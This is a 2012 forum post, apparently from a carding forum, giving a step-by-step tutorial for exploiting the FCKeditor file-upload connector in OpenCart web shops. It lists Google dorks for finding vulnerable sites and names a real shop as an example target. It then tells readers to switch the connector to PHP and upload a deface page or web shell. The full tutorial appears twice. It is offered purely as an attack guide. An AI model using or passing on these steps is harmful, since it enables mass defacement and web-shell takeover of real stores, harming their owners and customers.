CardingMafia Admin
03-28-2012, 09:59 AM
This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here
1- open Google.com and enter Dork:
inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or
nurl:Powered By OpenCart
You'll Got a lot of websites by google, select anyone ... For Example i got this one
School Shopper Home Page (http://www.schoolshopper.com.au/)
Then i'll will simply add the vuln URL after the website
Example
FCKeditor - Connectors Tests (http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)
(The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)
Now a Page will be open Like This
http://4.bp.blogspot.com/-lidWGvNV1vA/TosW8ZqPi1I/AAAAAAAAAIQ/iL_Bz-Lc_z4/s640/wp1.bmp
Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)
http://2.bp.blogspot.com/-JD7gM3NbpD0/TosYS9WnlxI/AAAAAAAAAIU/KK0eGV0U1jY/s400/wp2.bmp
and Now see file upload option and upload your deface or shell
and for checking shell or deface check this url
www.site.com/deface.html
or
www.site.com/shell.php
1- open Google.com and enter Dork:
inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or
nurl:Powered By OpenCart
You'll Got a lot of websites by google, select anyone ... For Example i got this one
School Shopper Home Page (http://www.schoolshopper.com.au/)
Then i'll will simply add the vuln URL after the website
Example
FCKeditor - Connectors Tests (http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)
(The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)
Now a Page will be open Like This
http://4.bp.blogspot.com/-lidWGvNV1vA/TosW8ZqPi1I/AAAAAAAAAIQ/iL_Bz-Lc_z4/s640/wp1.bmp
Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)
http://2.bp.blogspot.com/-JD7gM3NbpD0/TosYS9WnlxI/AAAAAAAAAIU/KK0eGV0U1jY/s400/wp2.bmp
and Now see file upload option and upload your deface or shell
and for checking shell or deface check this url
www.site.com/deface.html
or
www.site.com/shell.php